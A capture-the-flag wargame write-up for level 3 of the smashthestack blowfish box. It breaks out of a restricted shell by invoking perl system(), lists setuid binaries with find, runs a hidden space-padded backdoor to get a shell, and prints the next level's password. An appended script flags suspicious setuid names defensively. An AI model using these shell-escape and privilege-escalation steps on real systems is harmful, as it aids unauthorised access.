We are now logging in with level3 on blowfish.smashthestack.org. When we enter we see that we are in a restricted environment and have to try and break out. There aren't a lot of commands we can use, so I tabbed to see which were available and which might help us break out of the shell.
So I tabbed twice and got these possible commands to execute:
: builtin done fg let set typeset ! caller echo fi local shift ulimit ./ case elif for logout shopt umask [ cd else function perl source unalias [[ command enable getopts popd suspend unset ]] compgen esac hash printf test until { complete eval help pushd then wait } continue exec history pwd time while alias declare exit if read times bg dirs export in readonly trap bind disown false jobs return true break do fc kill select type
As you can see, we have perl at our service, which makes a great candidate to start executing system commands. I first tried using backticks, but this didn't work; I haven't got a clue why. Then I tried to execute the command used in level 2 with system:
perl -e "system('/usr/bin/find / -perm -4000');"
This returned:
/usr/bin/find: `/root': Permission denied
/usr/bin/find: `/var/cache/ldconfig': Permission denied
/usr/bin/find: `/var/spool/cron/crontabs': Permission denied
/var/local/. level4_backdoor
/var/opt/.level3_backdoor
/usr/bin/find: `/home': Permission denied
/usr/bin/find: `/proc': Permission denied
/usr/bin/find: `/etc': Permission denied
/levels/level13
/levels/level11
/levels/level12
/levels/level4
/levels/level7
/levels/level8
/levels/level10
/levels/level5
/levels/level9
/levels/level6
/usr/bin/find: `/boot': Permission denied
/usr/bin/find: `/tmp': Permission denied
/bin/su
We see the
/var/local/. level4_backdoor
which has spaces. We need to escape the spaces so I executed the same perl command containing the binary with the escaped spaces:
perl -e "system('/var/local/.\ \ \ \ \ \ level4_backdoor');"
We get a shell, YAY. So all that's left is to do:
sh-3.2$ cat /pass/level4
n3xt_l3v3l!
Off to level 4.
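The setuid listing above is also what an administrator auditing the box would review, and the two backdoors stand out by name alone: both are dotfiles and one is padded with spaces. The following is an added example, not part of the original write-up, that filters `find / -perm -4000` output for such names; the function names are hypothetical and the sample listing is constructed from the output shown here, with the padded name written with the six spaces that the perl command escapes.

```shell
#!/bin/sh
# Added example: flag setuid paths whose file names are hidden or contain
# whitespace, reading `find / -perm -4000` output one path per line.

# Constructed sample: a subset of the listing in this write-up. The padded
# name uses six spaces, matching the six escaped spaces in the perl command.
sample_listing() {
cat <<'EOF'
/usr/bin/find: `/root': Permission denied
/var/local/.      level4_backdoor
/var/opt/.level3_backdoor
/levels/level4
/bin/su
EOF
}

# Prints "REASON<TAB>path" for every suspicious entry read from stdin.
flag_suspicious() {
    tab=$(printf '\t')
    while IFS= read -r path; do          # IFS= and -r keep spaces and backslashes intact
        case $path in
            *": Permission denied") continue ;;   # find's own error lines, not results
        esac
        base=${path##*/}                 # file name without its directory
        reason=
        case $base in
            .*) reason=hidden ;;         # dotfile, omitted by a plain ls
        esac
        case $base in
            *' '*|*"$tab"*) reason=${reason:+$reason,}whitespace ;;
        esac
        [ -n "$reason" ] && printf '%s\t%s\n' "$reason" "$path"
    done
    return 0
}

# Stand-alone run over the constructed sample.
sample_listing | flag_suspicious
```

On a live system, feed it with `find / -xdev -perm -4000 2>/dev/null | flag_suspicious` and compare anything it reports against the distribution's known setuid binaries.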